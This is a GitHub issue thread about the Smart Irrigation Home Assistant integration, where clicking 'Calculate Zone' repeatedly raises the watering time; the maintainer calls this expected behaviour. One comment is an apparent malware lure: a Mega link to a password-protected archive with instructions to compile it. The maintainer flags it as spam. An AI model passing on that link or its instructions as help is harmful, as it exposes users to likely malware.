### ISSUE TITLE
When Clicking Calculate zone - It increases with each click

### ISSUE THREAD

**Issue by sweti3** [jeroenterheerdt/HAsmartirrigation#494]
### What happened?

Today, I noticed over the last weeks ( Ideactivated the irrigation automation as it rained pretty hard those days) - that each zone is at 3600s. So far so good. Startet watering each zone for 60 minutes. As we got a new watermeter per zone, I thought: Hey I can also now calculate the exact throughput - great. 

After doing that, I entered the new values in Smart Irrigation. Reset the buckets, and "out of fun" clicked on calculate zone. It immediately increased. Clicked again, increased again. and so on: 

![grafik](https://github.com/user-attachments/assets/0d17a805-c863-42fb-bc37-748305f89919)

After clicking 4 times now:

![grafik](https://github.com/user-attachments/assets/43518191-35f2-410c-8116-4b7bf7e211f1)

### How to reproduce

Click on one zone "Calculate Zone" -> then the time to water increases by each click:
![grafik](https://github.com/user-attachments/assets/12de6e9d-5e4c-4eae-9de3-4e1d566aa681)

here the log (sorry did not know where to put it else !)

### Relevant log output

```shell
Too huge to put in
```

### Which version are you running?

v2024.8.2

### Diagnostics file

- [X] I have attached a diagnostics file

### Additional information

[home-assistant_smart_irrigation_2024-09-20T07-53-59.185Z.log](https://github.com/user-attachments/files/17071874/home-assistant_smart_irrigation_2024-09-20T07-53-59.185Z.log)

**Comment by pinpolhoxx** [comment]
I think this will help you.
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by sweti3** [comment]
> I think this will help you. https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A Archive password: changeme If you don't have the c compliator, install it.(gcc or clang)

What is that exactly (before I downlaod anyting) and what to do with it? compile as it is a new version of the SMart Irrigation?

**Comment by jeroenterheerdt** [comment]
> > I think this will help you. https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A Archive password: changeme If you don't have the c compliator, install it.(gcc or clang)
> 
> What is that exactly (before I downlaod anyting) and what to do with it? compile as it is a new version of the SMart Irrigation?

don't do this, this is spam.

**Comment by sweti3** [comment]
> > > I think this will help you. https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A Archive password: changeme If you don't have the c compliator, install it.(gcc or clang)
> > 
> > 
> > What is that exactly (before I downlaod anyting) and what to do with it? compile as it is a new version of the SMart Irrigation?
> 
> don't do this, this is spam.

Also when clicking on calculate all zones nothing happens :/

**Comment by sweti3** [comment]
Still as of today the issue is the same, pressing calculate all zones gives zero changes to the times :/

**Comment by jeroenterheerdt** [comment]
I don't see the problem here. you are clicking the calculate button, so of course if irrigation is needed the duration increases. You should be using the calculate button only when testing to confirm it works, which it looks like it does. Then, just use automatic calculation or call the relevant services.
